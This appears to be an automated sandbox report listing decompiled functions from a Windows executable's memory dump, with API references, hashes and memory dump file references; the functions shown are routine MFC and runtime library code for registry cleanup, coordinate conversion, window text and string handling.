0x0040d8e0
0x0040d8e8
0x0040d8e9
0x0040d8ea
0x0040d8f3
0x0040d8f8
0x0040d8ff

APIs

__EH_prolog3_catch.LIBCMT ref: 0040D812
RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 0040D831
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 0040D84F
RegDeleteKeyA.ADVAPI32(?,?), ref: 0040D8CA
RegCloseKey.ADVAPI32(?), ref: 0040D8D5

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseDeleteEnumH_prolog3_catchOpen
String ID:
API String ID: 3522057324-0
Opcode ID: cb37df16e1151fe7b3ca810dce6b8c2972d4e7736cff12257cd2ee069f27ab6f
Instruction ID: 76f2a7b93e2c1dc243c85d088a585c4e75851b929d9529e485351bd3b216e472
Opcode Fuzzy Hash: cb37df16e1151fe7b3ca810dce6b8c2972d4e7736cff12257cd2ee069f27ab6f
Instruction Fuzzy Hash: 3F218D76D00219DBDB25EFA4D8416EEB7B4EB08314F10413AE961B72D0DB745E489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00421B1A, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421B1A(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x4527f8; // 0x60
					_t12 =  *0x4527fc; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E00413F6B(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x00421b1d
0x00421b20
0x00421b25
0x00421b71
0x00421b77
0x00000000
0x00421b27
0x00421b30
0x00421b35
0x00421b6b
0x00421b6d
0x00421b7c
0x00421b7c
0x00421b8e
0x00421b96
0x00421b9c
0x00421b9e
0x00421b3c
0x00421b3e
0x00421b42
0x00421b4a
0x00421b51
0x00421b54
0x00421b54
0x00421b35
0x00421ba5

APIs

GetMapMode.GDI32(?,?,?,?,?,?,0041A93D,?,00000000,0000001C,0041B2AB,?,?,?,?,?), ref: 00421B2A
GetDeviceCaps.GDI32(?,00000058), ref: 00421B64
GetDeviceCaps.GDI32(?,0000005A), ref: 00421B6D

Part of subcall function 00413F6B: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413FAB
Part of subcall function 00413F6B: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413FC8

MulDiv.KERNEL32(?,000009EC,00000060), ref: 00421B91
MulDiv.KERNEL32(00000000,000009EC,?), ref: 00421B9C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: cd3d206cccf7f43f11e33ef7c66f41ff2f55226f59790240a23694a545a543c4
Instruction ID: 6a8568c6f472b5ba2f36c124c634809e7b624eafdddc9d412788081ab557a752
Opcode Fuzzy Hash: cd3d206cccf7f43f11e33ef7c66f41ff2f55226f59790240a23694a545a543c4
Instruction Fuzzy Hash: 6B11E032700614AFCB21AF59DC44C1EBBB9EF98751B11442AF94257330D775AC028F54

Uniqueness

Uniqueness Score: -1.00%

Function 00421BA8, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00421BA8(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x4527f8; // 0x60
					_t12 =  *0x4527fc; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E00413F02(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

0x00421bab
0x00421bae
0x00421bb3
0x00421bff
0x00421c05
0x00000000
0x00421bb5
0x00421bbe
0x00421bc3
0x00421bf9
0x00421bfb
0x00421c0a
0x00421c0a
0x00421c1c
0x00421c25
0x00421c2a
0x00421c2c
0x00421bca
0x00421bcc
0x00421bd0
0x00421bd8
0x00421bdf
0x00421be2
0x00421be2
0x00421bc3
0x00421c33

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,0041A981,?,?,?,?,?,?), ref: 00421BB8
GetDeviceCaps.GDI32(?,00000058), ref: 00421BF2
GetDeviceCaps.GDI32(?,0000005A), ref: 00421BFB

Part of subcall function 00413F02: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413F42
Part of subcall function 00413F02: MulDiv.KERNEL32(?,00000000,00000000), ref: 00413F5F

MulDiv.KERNEL32(?,00000060,000009EC), ref: 00421C1F
MulDiv.KERNEL32(00000000,?,000009EC), ref: 00421C2A

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: fcd423b0ab48d22ff24563ae87f92f7aac0099137693f9d545045a3a3275e3ae
Instruction ID: 44575178ca76063926b680eaeb6e0f8933480824aa1c9693c9f482a1f2d1aa15
Opcode Fuzzy Hash: fcd423b0ab48d22ff24563ae87f92f7aac0099137693f9d545045a3a3275e3ae
Instruction Fuzzy Hash: AD11E035600610AFCB21AF55DC44C1EBBBAEF99710B11442AFA8157360C775EC01DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00416AB0, Relevance: 7.6, APIs: 5, Instructions: 53
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00416AB0(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
				signed int _v8;
				char _v263;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t9;
				struct HWND__* _t21;
				void* _t22;
				intOrPtr _t25;
				int _t26;
				CHAR* _t27;
				signed int _t28;

				_t25 = __edx;
				_t22 = __ecx;
				_t9 =  *0x44f5d0; // 0x765b253d
				_v8 = _t9 ^ _t28;
				_t21 = _a4;
				_t27 = _a8;
				if(_t21 == 0) {
					L1:
					E00415838(_t22);
				}
				if(_t27 == 0) {
					goto L1;
				}
				_t26 = lstrlenA(_t27);
				_v264 = 0;
				E004277B0(_t26,  &_v263, 0, 0xff);
				if(_t26 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t26 || lstrcmpA( &_v264, _t27) != 0) {
					_t16 = SetWindowTextA(_t21, _t27);
				}
				return E0042569C(_t16, _t21, _v8 ^ _t28, _t25, _t26, _t27);
			}

0x00416ab0
0x00416ab0
0x00416ab9
0x00416ac0
0x00416ac4
0x00416aca
0x00416ace
0x00416ad0
0x00416ad0
0x00416ad0
0x00416ad7
0x00000000
0x00000000
0x00416ae5
0x00416af0
0x00416af7
0x00416b06
0x00416b2f
0x00416b2f
0x00416b43

APIs

lstrlenA.KERNEL32(?), ref: 00416ADA
_memset.LIBCMT ref: 00416AF7
GetWindowTextA.USER32 ref: 00416B11
lstrcmpA.KERNEL32(00000000,?), ref: 00416B23
SetWindowTextA.USER32(?,?), ref: 00416B2F

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: 7314dc9b8a181e9f1d25e401592f3e5efe5aff880111fa835fc632f8ba00b0b3
Instruction ID: 9ab904172df34d6c31fc328be64f6b40931c15da500513f4f743aa110a11791f
Opcode Fuzzy Hash: 7314dc9b8a181e9f1d25e401592f3e5efe5aff880111fa835fc632f8ba00b0b3
Instruction Fuzzy Hash: 9001C8B2A0112867D711AF64AC84FDF77ACEF15340F00407AF945D3141DA74ED8487A8

Uniqueness

Uniqueness Score: -1.00%

Function 00422E21, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 212
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00422E21(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t99;
				signed short _t101;
				signed int _t107;
				signed int _t111;
				void* _t112;
				signed short _t119;
				signed int _t123;
				signed int _t125;
				signed short* _t126;
				intOrPtr* _t128;
				signed int _t141;
				void* _t142;
				signed int _t147;
				signed int* _t148;
				signed short* _t150;
				signed int _t151;
				signed short _t152;
				void* _t153;

				_push(0x18);
				E004271DA(E0043B3DB, __ebx, __edi, __esi);
				_t147 =  *(_t153 + 8);
				_t142 = 4;
				 *_t147 = __ecx;
				_t148 = _t147 + _t142;
				if( *(_t153 + 0x14) == 6 ||  *(_t153 + 0x14) == 0xc) {
					 *_t148 =  *(_t153 + 0x10);
					_t148 = _t148 + _t142;
				}
				_t128 =  *((intOrPtr*)(_t153 + 0x18));
				 *(_t153 - 0x14) =  *(_t153 - 0x14) & 0x00000000;
				 *((intOrPtr*)(_t153 - 0x18)) =  *_t128;
				 *(_t153 + 8) =  *(_t128 + 8);
				 *(_t153 - 0x10) =  *(_t128 + 0xc);
				_t99 =  *(_t153 + 0xc);
				 *(_t153 + 0x10) = _t99;
				if( *_t99 == 0) {
					L55:
					if( *(_t153 + 8) <= 0) {
						__eflags =  *( *(_t153 + 0x10));
						if( *( *(_t153 + 0x10)) == 0) {
							_t101 = 0;
							__eflags = 0;
						} else {
							 *( *(_t153 + 0x1c)) =  *(_t128 + 8);
							_t101 = 0x8002000f;
						}
						goto L61;
					}
					_t101 = 0x8002000e;
					goto L57;
				} else {
					do {
						_t101 =  *( *(_t153 + 0x10)) & 0xff;
						_t123 =  *(_t153 + 8) - 1;
						 *(_t153 + 8) = _t123;
						 *(_t153 + 0x14) = _t101;
						if(_t101 != 0xff && (_t101 & 0x00000040) != 0) {
							_t101 = _t101 & 0xffffffbf | 0x00004000;
							 *(_t153 + 0x14) = _t101;
						}
						if(_t123 <  *(_t153 - 0x10)) {
							__eflags = _t101 - 0xff;
							if(__eflags != 0) {
								__eflags =  *(_t153 - 0x14);
								if( *(_t153 - 0x14) != 0) {
									break;
								}
								__eflags = _t101 - 0xc;
								if(__eflags != 0) {
									break;
								}
								 *0x452a58 = 0xa;
								 *0x452a60 = 0x80020004;
								_t150 = 0x452a58;
								goto L28;
							}
							 *(_t153 - 0x10) =  *(_t153 - 0x10) & 0x00000000;
							 *(_t153 + 8) =  *( *((intOrPtr*)(_t153 + 0x18)) + 0xc);
							 *(_t153 - 0x14) = 1;
						} else {
							if(_t101 == 0xff) {
								break;
							}
							_t125 = _t123 << 4;
							_t150 = _t125 +  *((intOrPtr*)(_t153 - 0x18));
							if(_t101 == 0xc) {
								L28:
								if((_t101 & 0x00004000) == 0) {
									_t107 = (_t101 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t107 - 0x13;
									if(__eflags > 0) {
										goto L53;
									}
									switch( *((intOrPtr*)(_t107 * 4 +  &M004230B9))) {
										case 0:
											_t72 = __esi + 8; // 0x0
											__eax =  *_t72;
											goto L51;
										case 1:
											_t82 = __esi + 8; // 0x0
											__eax =  *_t82;
											goto L51;
										case 2:
											 *__edi =  *(__esi + 8);
											goto L52;
										case 3:
											 *__edi =  *(__esi + 8);
											goto L46;
										case 4:
											_t74 = __esi + 8; // 0x0
											__eax =  *_t74;
											 *__edi =  *_t74;
											_t75 = __esi + 0xc; // 0x0
											__eax =  *_t75;
											__edi[1] = __eax;
											L46:
											__edi =  &(__edi[2]);
											goto L53;
										case 5:
											__eax = 0;
											__eflags =  *(__esi + 8) - __ax;
											__eax = 0 | __eflags != 0x00000000;
											goto L51;
										case 6:
											L38:
											 *_t148 = _t151;
											goto L52;
										case 7:
											goto L53;
										case 8:
											_t70 =  &(_t150[4]); // 0x0
											_t109 =  *_t70;
											goto L51;
										case 9:
											_t71 = __esi + 8; // 0x0
											__eax =  *_t71 & 0x000000ff;
											goto L51;
										case 0xa:
											_t73 = __esi + 8; // 0x0
											__eax =  *_t73 & 0x0000ffff;
											L51:
											 *_t148 = _t109;
											L52:
											_t148 = _t148 + _t142;
											goto L53;
									}
								}
								if(_t101 != 0x400b) {
									L37:
									_t67 =  &(_t150[4]); // 0x0
									_t151 =  *_t67;
									goto L38;
								}
								_t124 =  *((intOrPtr*)(_t153 + 0x24));
								if( *((intOrPtr*)(_t153 + 0x24)) == 0) {
									goto L37;
								}
								_t48 =  &(_t150[4]); // 0x0
								 *(_t153 + 0x14) = 0 |  *( *_t48) != 0x00000000;
								_t111 = E0040A3C7( *( *_t48), _t142);
								if(_t111 == 0) {
									_t54 = _t153 + 0x14;
									 *_t54 =  *(_t153 + 0x14) & 0x00000000;
									__eflags =  *_t54;
								} else {
									 *_t111 =  *(_t153 + 0x14);
									 *(_t153 + 0x14) = _t111;
								}
								_t56 =  &(_t150[4]); // 0x0
								_t112 = E00422981(_t153 - 0x24, _t150,  *(_t153 + 0x14),  *_t56, 1);
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								E00422DA3(_t124, _t142, _t153,  *((intOrPtr*)(_t124 + 8)), _t112);
								 *(_t153 - 4) =  *(_t153 - 4) | 0xffffffff;
								_t176 =  *((intOrPtr*)(_t153 - 0x1c));
								if( *((intOrPtr*)(_t153 - 0x1c)) != 0) {
									_push( *((intOrPtr*)(_t153 - 0x24)));
									E0040A3F2(_t124, _t142, _t148, _t150, _t176);
								}
								_t151 =  *(_t153 + 0x14);
								_t142 = 4;
								goto L38;
							}
							_t141 =  *_t150 & 0x0000ffff;
							if(_t101 == _t141) {
								goto L28;
							}
							_t126 = _t125 +  *((intOrPtr*)(_t153 + 0x20));
							if(_t101 != 0xe) {
								 *(_t153 + 0xc) = _t101 & 0x0000ffff;
							} else {
								 *(_t153 + 0xc) = 8;
							}
							if(_t141 ==  *(_t153 + 0xc)) {
								L17:
								_t142 = 4;
								if(_t101 == 0xe) {
									if( *_t150 ==  *(_t153 + 0xc)) {
										_t126[4] = E0042284E(_t150[4]);
										 *_t126 = 8;
									} else {
										_t152 = _t126[4];
										_t119 = E0042284E(_t152);
										_t126[4] = _t119;
										__imp__#6(_t152);
									}
									 *(_t153 + 0x14) = 8;
									_t101 =  *(_t153 + 0x14);
									_t142 = 4;
								}
								_t150 = _t126;
								goto L28;
							} else {
								__imp__#12(_t126, _t150, 0,  *(_t153 + 0xc));
								if(_t101 < 0) {
									L57:
									 *( *(_t153 + 0x1c)) =  *(_t153 + 8);
									L61:
									return E004272B2(_t101);
								}
								_t101 =  *(_t153 + 0x14);
								goto L17;
							}
						}
						L53:
						 *(_t153 + 0x10) =  &(( *(_t153 + 0x10))[1]);
					} while ( *( *(_t153 + 0x10)) != 0);
					_t128 =  *((intOrPtr*)(_t153 + 0x18));
					goto L55;
				}
			}

0x00422e21
0x00422e28
0x00422e2d
0x00422e32
0x00422e33
0x00422e35
0x00422e3c
0x00422e48
0x00422e4a
0x00422e4a
0x00422e4c
0x00422e51
0x00422e55
0x00422e5b
0x00422e61
0x00422e64
0x00422e6a
0x00422e6d
0x00423083
0x00423087
0x0042309b
0x0042309e
0x004230af
0x004230af
0x004230a0
0x004230a6
0x004230a8
0x004230a8
0x00000000
0x0042309e
0x00423089
0x00000000
0x00422e73
0x00422e73
0x00422e7d
0x00422e80
0x00422e89
0x00422e8c
0x00422e8f
0x00422e98
0x00422e9d
0x00422e9d
0x00422ea3
0x00422f51
0x00422f54
0x00422f6f
0x00422f73
0x00000000
0x00000000
0x00422f79
0x00422f7d
0x00000000
0x00000000
0x00422f83
0x00422f8c
0x00422f96
0x00000000
0x00422f96
0x00422f5c
0x00422f60
0x00422f63
0x00422ea9
0x00422eac
0x00000000
0x00000000
0x00422eb5
0x00422ebc
0x00422ebf
0x00422f9b
0x00422f9f
0x0042301a
0x0042301d
0x00423020
0x00000000
0x00000000
0x00423022
0x00000000
0x00423035
0x00423035
0x00000000
0x00000000
0x0042306a
0x0042306a
0x00000000
0x00000000
0x00423054
0x00000000
0x00000000
0x0042305b
0x00000000
0x00000000
0x00423041
0x00423041
0x00423044
0x00423046
0x00423046
0x00423049
0x0042304c
0x0042304c
0x00000000
0x00000000
0x0042305f
0x00423061
0x00423065
0x00000000
0x00000000
0x00423013
0x00423013
0x00000000
0x00000000
0x00000000
0x00000000
0x00423029
0x00423029
0x00000000
0x00000000
0x0042302f
0x0042302f
0x00000000
0x00000000
0x0042303b
0x0042303b
0x0042306d
0x0042306d
0x0042306f
0x0042306f
0x00000000
0x00000000
0x00423022
0x00422fa5
0x00423010
0x00423010
0x00423010
0x00000000
0x00423010
0x00422fa7
0x00422fac
0x00000000
0x00000000
0x00422fae
0x00422fba
0x00422fbd
0x00422fc5
0x00422fd1
0x00422fd1
0x00422fd1
0x00422fc7
0x00422fca
0x00422fcc
0x00422fcc
0x00422fd7
0x00422fe0
0x00422fe8
0x00422ff0
0x00422ff5
0x00422ff9
0x00422ffd
0x00422fff
0x00423002
0x00423007
0x00423008
0x0042300d
0x00000000
0x0042300d
0x00422ec5
0x00422ecb
0x00000000
0x00000000
0x00422ed4
0x00422eda
0x00422ee8
0x00422edc
0x00422edc
0x00422edc
0x00422eef
0x00422f09
0x00422f0f
0x00422f10
0x00422f19
0x00422f38
0x00422f3b
0x00422f1b
0x00422f1b
0x00422f1f
0x00422f25
0x00422f28
0x00422f28
0x00422f40
0x00422f47
0x00422f4c
0x00422f4c
0x00422f4d
0x00000000
0x00422ef1
0x00422ef8
0x00422f00
0x0042308e
0x00423094
0x004230b1
0x004230b6
0x004230b6
0x00422f06
0x00000000
0x00422f06
0x00422eef
0x00423071
0x00423071
0x00423077
0x00423080
0x00000000
0x00423080

APIs

__EH_prolog3.LIBCMT ref: 00422E28
VariantChangeType.OLEAUT32(?,?,00000000,0000000C), ref: 00422EF8
SysFreeString.OLEAUT32(?), ref: 00422F28

Strings

X*E, xrefs: 00422F96

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeFreeH_prolog3StringTypeVariant
String ID: X*E
API String ID: 580759134-4097040173
Opcode ID: 30b4adb7f92c4450969bc05ed49153cb6d699763ebf9539a2c714e7032448dda
Instruction ID: 7d5537c4e89ee5a54534abc9f7542034b9e02394bca3fa197badf67db7e7968e
Opcode Fuzzy Hash: 30b4adb7f92c4450969bc05ed49153cb6d699763ebf9539a2c714e7032448dda
Instruction Fuzzy Hash: D6819070600226DFDB20DF14E5407AA77B0FF04311F94805AE895AB395C3BDDE92DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404550, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404550(intOrPtr _a4, signed int _a8, signed int _a12) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				char _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t48;
				signed int _t51;
				signed int _t53;
				intOrPtr* _t56;
				intOrPtr* _t57;
				intOrPtr _t60;
				unsigned int _t69;
				intOrPtr* _t71;
				unsigned int _t74;
				signed int _t75;
				signed int _t76;
				intOrPtr _t88;
				signed int _t92;
				signed int _t97;
				intOrPtr _t98;
				void* _t99;

				_t95 = _t97;
				_push(0xffffffff);
				_push(E0043B8C0);
				_push( *[fs:0x0]);
				_t98 = _t97 - 0x18;
				_t48 =  *0x44f5d0; // 0x765b253d
				_push(_t48 ^ _t97);
				 *[fs:0x0] =  &_v16;
				_v20 = _t98;
				_t51 = _a8;
				_t88 = _a4;
				_t92 = _t51 | 0x00000007;
				if(_t92 <= 0x7ffffffe) {
					_t69 =  *(_t88 + 0x18);
					_t51 = 0xaaaaaaab * _t92;
					_t74 = _t69 >> 1;
					_t84 = 0xaaaaaaab * _t92 >> 0x20 >> 1;
					__eflags = 0xaaaaaaab * _t92 >> 0x20 >> 1 - _t74;
					if(__eflags < 0) {
						_t51 = 0x7ffffffe - _t74;
						__eflags = _t69 - 0x7ffffffe;
						if(__eflags <= 0) {
							_t92 = _t74 + _t69;
						}
					}
				} else {
					_t92 = _t51;
				}
				_t75 = _t92 + 1;
				_v8 = 0;
				if(_t75 > 0) {
					_t53 = _t51 | 0xffffffff;
					_t84 = _t53 % _t75;
					__eflags = _t53 / _t75 - 2;
					if(__eflags >= 0) {
						goto L7;
					} else {
						_v24 = 0;
						E00425E86( &_v40, _t84,  &_v24);
						_v40 = 0x44257c;
						E00429326( &_v40, 0x44ae50);
						_t64 = _a8;
						_v20 = _t98;
						_v8 = 2;
						_v28 = L00404E20(0, _t64 + 1, _t92, _t95);
						_v8 = 1;
						return E0040462E;
					}
				} else {
					_t75 = 0;
					L7:
					_t56 = E0040A3C7(0, _t75 + _t75);
					_t99 = _t98 + 4;
					_t71 = _t56;
					_v8 = 0xffffffff;
					_t76 = _a12;
					if(_t76 > 0) {
						if( *(_t88 + 0x18) < 8) {
							_t60 = _t88 + 4;
						} else {
							_t60 =  *((intOrPtr*)(_t88 + 4));
						}
						_t79 = _t76 + _t76;
						_t84 = _t92 + _t92 + 2;
						E00425DFA(_t71, _t76 + _t76, _t71, _t92 + _t92 + 2, _t60, _t79);
						_t76 = _a12;
						_t99 = _t99 + 0x10;
					}
					_t108 =  *(_t88 + 0x18) - 8;
					if( *(_t88 + 0x18) >= 8) {
						_push( *((intOrPtr*)(_t88 + 4)));
						E0040A3F2(_t71, _t84, _t88, _t92, _t108);
						_t76 = _a12;
					}
					_t57 = _t88 + 4;
					 *_t57 = 0;
					 *_t57 = _t71;
					 *(_t88 + 0x18) = _t92;
					 *(_t88 + 0x14) = _t76;
					if(_t92 >= 8) {
						_t57 = _t71;
					}
					 *((short*)(_t57 + _t76 * 2)) = 0;
					 *[fs:0x0] = _v16;
					return _t57;
				}
			}

0x00404551
0x00404553
0x00404555
0x00404560
0x00404561
0x00404567
0x0040456e
0x00404572
0x00404578
0x0040457b
0x0040457e
0x00404583
0x0040458c
0x00404592
0x0040459a
0x0040459e
0x004045a0
0x004045a2
0x004045a4
0x004045ab
0x004045ad
0x004045af
0x004045b1
0x004045b1
0x004045af
0x0040458e
0x0040458e
0x0040458e
0x004045b6
0x004045bb
0x004045be
0x004045d9
0x004045de
0x004045e0
0x004045e3
0x00000000
0x004045e5
0x004045ec
0x004045ef
0x004045fd
0x00404604
0x00404609
0x0040460f
0x00404615
0x0040461e
0x00404621
0x0040462d
0x0040462d
0x004045c0
0x004045c0
0x004045c2
0x004045c6
0x004045cb
0x004045ce
0x004045d0
0x00404637
0x0040463c
0x00404642
0x00404649
0x00404644
0x00404644
0x00404644
0x0040464c
0x00404650
0x00404656
0x0040465b
0x0040465e
0x0040465e
0x00404661
0x00404665
0x0040466a
0x0040466b
0x00404670
0x00404673
0x00404679
0x0040467c
0x00404681
0x00404683
0x00404686
0x00404689
0x0040468b
0x0040468b
0x0040468d
0x00404696
0x004046a4
0x004046a4

APIs

std::exception::exception.LIBCMT ref: 004045EF
__CxxThrowException@8.LIBCMT ref: 00404604
_memcpy_s.LIBCMT ref: 00404656

Strings

|%D, xrefs: 004045FD

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw_memcpy_sstd::exception::exception
String ID: |%D
API String ID: 464988439-1005067592
Opcode ID: b0f99fea21a559c53f4b4cd878025ceb5818ae6e15371fef4ebc9c2adecbba31
Instruction ID: 280a102d8a42f444420ea416332aab166492caea0ea6a6dbe51039a3dc83a96b
Opcode Fuzzy Hash: b0f99fea21a559c53f4b4cd878025ceb5818ae6e15371fef4ebc9c2adecbba31
Instruction Fuzzy Hash: 1C41B1B1A00605ABCB04CF59C98099EB7B4FB49314F10863FE526A7780E779AA14CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 0040EADE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040EADE(void* __edi, intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;

				if(E0040E932() == 0) {
					if(_a4 != 0x12340042) {
						L9:
						_t14 = 0;
						L10:
						return _t14;
					}
					_t23 = _a8;
					if(_t23 == 0 ||  *_t23 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L9;
					} else {
						 *((intOrPtr*)(_t23 + 4)) = 0;
						 *((intOrPtr*)(_t23 + 8)) = 0;
						 *((intOrPtr*)(_t23 + 0xc)) = GetSystemMetrics(0);
						_t18 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t23 + 0x10) = _t18;
						 *((intOrPtr*)(_t23 + 0x24)) = 1;
						if( *_t23 >= 0x48) {
							E00429273(_t25, _t23 + 0x28, 0x20, "DISPLAY", 0x1f);
						}
						_t14 = 1;
						goto L10;
					}
				}
				return  *0x4524d8(_a4, _a8);
			}

0x0040eaeb
0x0040eb04
0x0040eb6f
0x0040eb6f
0x0040eb71
0x00000000
0x0040eb72
0x0040eb06
0x0040eb0d
0x00000000
0x0040eb26
0x0040eb27
0x0040eb2a
